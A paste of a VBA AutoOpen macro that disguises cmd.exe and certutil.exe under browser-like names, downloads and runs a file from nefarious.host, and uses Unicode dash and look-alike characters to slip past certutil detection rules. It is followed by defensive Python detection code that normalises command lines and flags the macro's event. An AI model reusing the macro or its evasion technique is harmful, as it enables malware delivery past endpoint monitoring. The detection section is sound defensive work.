auto-open-macro-tanium-bypass

a guest, Oct 11th, 2019
Sub autoopen()
'
' autoopen Macro
' Macro created 9/26/2019 by Nefarious
' I am coming for you!
'
Dim fso, fso1 As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Set fso1 = CreateObject("Scripting.FileSystemObject")

Set TmpFolder = fso.GetSpecialFolder(2)
Dim RetVal
Call fso.CopyFile("C:\windows\system32\cmd.exe", TmpFolder & "\chrome.exe", True)
Call fso1.CopyFile("C:\windows\system32\certutil.exe", TmpFolder & "\notSertUtil.exe", True)
RetVal1 = Shell(TmpFolder & "\chrome.exe /c " & TmpFolder & "\notSertUtil.exe —ur" & ChrW(7480) & "cache —sp" & ChrW(7480) & "it —f http://nefarious.host/eicar-test-files/test-upx.exe " & TmpFolder & "\firefox.exe && " & TmpFolder & "\firefox.exe /historysource 1 /scomma " & TmpFolder & "\history.csv ", 1)
End Sub
'
' Used em-dashes and/or en-dashes, as well as Unicode MODIFIER LETTER CAPITAL L (U+1D38, decimal 7480), to avoid simple automated detection like this:
' process.path ends with 'certutil.exe' AND (process.command_line contains 'decode' OR process.command_line contains 'encode' OR process.command_line contains 'urlcache' OR process.command_line contains 'split')
' and
' to bypass rules that look for "normal" dashes https://github.com/0xrawsec/gene-rules/blob/master/rules/certutil.gen (some rules look for /y (slash why) and you can use -y)
' Also chrome.exe and ff are less suspect when DL'ing.
'
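The comments above describe two things a path-and-substring rule misses: look-alike characters inside the switches and a renamed copy of the binary. The detection logic below is an added example, not part of the paste, showing how a defender closes both gaps: NFKC-fold the command line (U+1D38 becomes a plain L), map every dash-class character to "-", and identify certutil by its PE OriginalFileName rather than its on-disk path. Event field names (image, original_file_name, command_line) are assumed Sysmon-style; the sample events are constructed, the first one mirroring the macro's command line.

```python
import unicodedata

# Switch keywords from the detection rule quoted in the paste, matched after normalisation.
CERTUTIL_TOKENS = ("decode", "encode", "urlcache", "split")


def normalize_cmdline(cmd):
    """Fold a command line to plain ASCII so look-alike characters cannot hide switches."""
    cmd = unicodedata.normalize("NFKC", cmd)   # U+1D38 (modifier capital L) -> 'L'
    out = []
    for ch in cmd:
        cat = unicodedata.category(ch)
        if cat == "Pd":                        # em dash, en dash and friends -> '-'
            out.append("-")
        elif cat in ("Cf", "Mn"):              # zero-width / combining marks: drop
            continue
        else:
            out.append(ch)
    # Treat '/y' and '-y' alike; URLs become 'http:--...', harmless for keyword search.
    return "".join(out).replace("/", "-").casefold()


def is_certutil(event):
    """Renamed copies (notSertUtil.exe) beat path checks, so prefer the PE's
    OriginalFileName (Sysmon process-create events carry it) over the image path."""
    name = event.get("original_file_name") or event.get("image", "")
    return name.rsplit("\\", 1)[-1].casefold() == "certutil.exe"


def certutil_indicators(event):
    """Return the indicators that fire for one process-create event (empty list = clean)."""
    if not is_certutil(event):
        return []
    raw = event.get("command_line", "")
    norm = normalize_cmdline(raw)
    hits = [t for t in CERTUTIL_TOKENS if t in norm]
    if any(ord(c) > 0x7F for c in raw):       # non-ASCII in a native tool's switches is itself odd
        hits.append("non_ascii_in_cmdline")
    return hits


# Constructed sample events (field names assumed, Sysmon-style); the first mirrors the macro above.
TEMP = "C:\\Users\\u\\AppData\\Local\\Temp"
SAMPLE_EVENTS = [
    {"image": TEMP + "\\notSertUtil.exe", "original_file_name": "CertUtil.exe",
     "command_line": TEMP + "\\notSertUtil.exe \u2014ur\u1d38cache \u2014sp\u1d38it -f "
                     "http://nefarious.host/eicar-test-files/test-upx.exe " + TEMP + "\\firefox.exe"},
    {"image": "C:\\Windows\\System32\\certutil.exe", "original_file_name": "CertUtil.exe",
     "command_line": "certutil.exe -dump cert.cer"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["image"].rsplit("\\", 1)[-1], "->", certutil_indicators(ev) or "clean")
```

The renamed-binary check only works where the logging pipeline records OriginalFileName; with path-only telemetry, the non-ASCII signal still fires on the first event, but the renamed copy itself stays invisible.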